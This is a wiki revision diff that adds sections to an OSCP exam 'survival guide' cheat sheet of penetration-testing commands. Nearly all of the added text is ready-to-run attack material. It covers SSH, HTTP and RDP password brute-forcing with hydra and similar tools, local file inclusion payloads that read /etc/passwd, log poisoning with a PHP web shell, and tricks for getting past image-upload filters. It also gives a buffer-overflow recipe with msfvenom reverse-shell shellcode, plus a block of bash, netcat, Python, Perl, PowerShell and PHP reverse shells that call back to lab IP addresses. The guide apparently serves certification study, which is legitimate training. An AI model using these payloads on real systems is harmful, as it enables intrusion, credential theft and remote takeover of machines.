Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- oscp_survival_guide [2021/02/06 21:14]
M0N5T3R [EDIT: Useful and fast exploit :]
+++ oscp_survival_guide [2021/02/06 22:47] (Version actuelle)
M0N5T3R
@@ Ligne 2721: / Ligne 2721: @@
-====== EDIT: Useful and fast exploit : ======
+====== EDIT: Useful and fast exploit - Cheat sheet : ======
+**Port 22 - SSH**
+<code>
+hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST
+</code>
+**Port 25 - SMTP **
+<code>
+nc 10.11.1.217 25
+[...]
+VRFY root
+2.0.0 root
+</code>
+**Port 53 - DNS**
+<code>
+dig axfr @$RHOST DOMAIN.COM
+dnsrecon -d DOMAIN.COM
+</code>
@@ Ligne 2755: / Ligne 2778: @@
 **Port 111 - Rpcbind**
-<code>rpcinfo -p 10.11.1.111
+<code>
+nmap -sV -p 111 --script=rpcinfo $RHOST
+nmap -p 111 --script nfs* $RHOST
+mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt
+groupadd --gid 1337 pwn
+useradd --uid 1337 -g pwn pwn
+rpcinfo -p 10.11.1.111
 rpcclient -U "" 10.11.1.111
 	srvinfo
@@ Ligne 2771: / Ligne 2803: @@
 </code>
+**Port 161 -  SNMP**
+<code>snmp-check $RHOST
+onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST
+snmpwalk -v1 -c public $RHOST
+nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP
+nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP
+</code>
 **Port 139/445 - SMB**
@@ Ligne 2885: / Ligne 2925: @@
-**LDAP - 389,636**
+**Port 389,636 - LDAP **
 <code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
 ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
@@ Ligne 2892: / Ligne 2932: @@
 </code>
-**HTTPS - 443**
+**Port 443 - HTTPS**
 <code>Read the actual SSL CERT to:
 find out potential correct vhost to GET
@@ Ligne 2901: / Ligne 2941: @@
 nmap -sV --script=ssl-heartbleed 10.1.10.111
 mod_ssl,OpenSSL version Openfuck
-<code>
+</code>
-**500 - ISAKMP IKE**
+**Port  500 - ISAKMP IKE**
 <code>ike-scan 10.11.1.111</code>
-**513 - Rlogin**
+**Port 513 - Rlogin**
 <code>apt install rsh-client
 rlogin -l root 10.11.1.111
 </code>
-**541 - FortiNet SSLVPN**
+**Port 541 - FortiNet SSLVPN**
 <code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
 </code>
-**1433 - MSSQL**
+**Port 1433 - MSSQL**
 <code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
 use auxiliary/scanner/mssql/mssql_ping
@@ Ligne 2948: / Ligne 2989: @@
 mount -t 10.11.1.111:/ /tmp/NFS
 </code>
 **Port 2100 - Oracle XML DB**
 <code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
 </code>
 **Port 3306 - MySQL**
 <code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
@@ Ligne 2957: / Ligne 3002: @@
 https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
 </code>
 **Port 3389 - RDP**
 <code>
@@ Ligne 2980: / Ligne 3027: @@
-**WinRM - 5985**
+**Port 5985 - WinRM **
 <code>https://github.com/Hackplayers/evil-winrm
 gem install evil-winrm
@@ Ligne 2989: / Ligne 3036: @@
-**Redis - 6379**
+**Port 6379 - Redis **
 <code>https://github.com/Avinash-acid/Redis-Server-Exploit
 python redis.py 10.10.10.160 redis
@@ Ligne 2995: / Ligne 3042: @@
-**MsDeploy - 8172**
+**Port 8172 - MsDeploy **
 <code>Microsoft IIS Deploy port
 IP:8172/msdeploy.axd
@@ Ligne 3094: / Ligne 3141: @@
 nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 </code>
+**LFI**
+<code>
+fimap -u "http://10.11.1.111/example.php?test="
+# Ordered output
+curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
+/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
+http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
+http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
+?page=php://filter/convert.base64-encode/resource=../config.php
+../../../../../boot.ini
+amap -d 10.11.1.111 8000
+# LFI Windows
+http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
+# Contaminating log files
+root@kali:~# nc -v 10.11.1.111 80
+.11.1.111: inverse host lookup failed: Unknown host
+(UNKNOWN) [10.11.1.111] 80 (http) open
+ <?php echo shell_exec($_GET['cmd']);?>
+http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
+</code>
@@ Ligne 3115: / Ligne 3191: @@
-*******************
-* note            *
+**Bypass image upload restrictions**
-*******************
+<code>
+- Change extension: .pHp3 or pHp3.jpg
+- Modify mimetype: Content-type: image/jpeg
+- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
+- Add gif header: GIF89a;
+- All at the same time.
+</code>
+**Password brute force - last resort**
+<code>
+cewl
+hash-identifier
+john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
+medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
+ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
+crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
+hydra -l root -P password-file.txt 10.11.1.111 ssh
+hydra -P password-file.txt -v 10.11.1.111 snmp
+hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
+hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
+hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
+# SIMPLE LOGIN GET
+hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
+# GET FORM with HTTPS
+hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
+# SIMPLE LOGIN POST
+hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
+# API REST LOGIN POST
+hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
+# Dictionary creation
+https://github.com/LandGrey/pydictor
+https://github.com/Mebus/cupp
+git clone https://github.com/sc0tfree/mentalist.git
+</code>
+**BOF**
+<code>
+# BASIC GUIDE
+. Send "A"*1024
+. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
+. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
+. Confirm the location with "B" and "C"
+. Check for badchars instead CCCC (ESP):
+badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
+with script _badchars.py and
+"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
+.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
+		a. !mona config -set workingfolder c:\logs\%p
+	    b. !mona bytearray -b "\x00\x0d"
+	    c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
+	    d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
+	    e. In " data", before unicode chars it shows badchars.
+. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"
+.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
+.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f
+. Generate shellcode and place it:
+msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"
+msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode
+. Final buffer like:
+buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
+</code>
+** Reverse Shells **
+<code>
+# Linux
+bash -i >& /dev/tcp/10.11.1.111/4443 0>&1
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f
+nc -e /bin/sh 10.11.1.111 4443
+# Python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\
+# Perl
+perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+# Windows
+nc -e cmd.exe 10.11.1.111 4443
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+# PHP most simple Linux
+<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>
+</code>
+**Disable ASLR on linux machine**
+<code>
+echo 0 > /proc/sys/kernel/randomize_va_space
+</code>
+**Get full shell on jail shelle**
+<code>
+python -c “import pty;pty.spawn(‘/bin/sh’);”
+echo ‘os.system(‘/bin/bash’)’
+perl -e ‘exec “/bin/sh”;’
+</code>
+** Find and locate the flags  **
+<code>
+#Linux:
+echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
+find / -name "network-secret.txt"
+locate "network-secret.txt"
+#Windows:
+echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul
+dir /s /b network-secret.txt
+</code>
+**Note template**
+<code>
 To work fast use CherryTree to take notes and use this template :
 https://ceso.github.io/files/oscp/template_pwk.ctb
+</code>

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page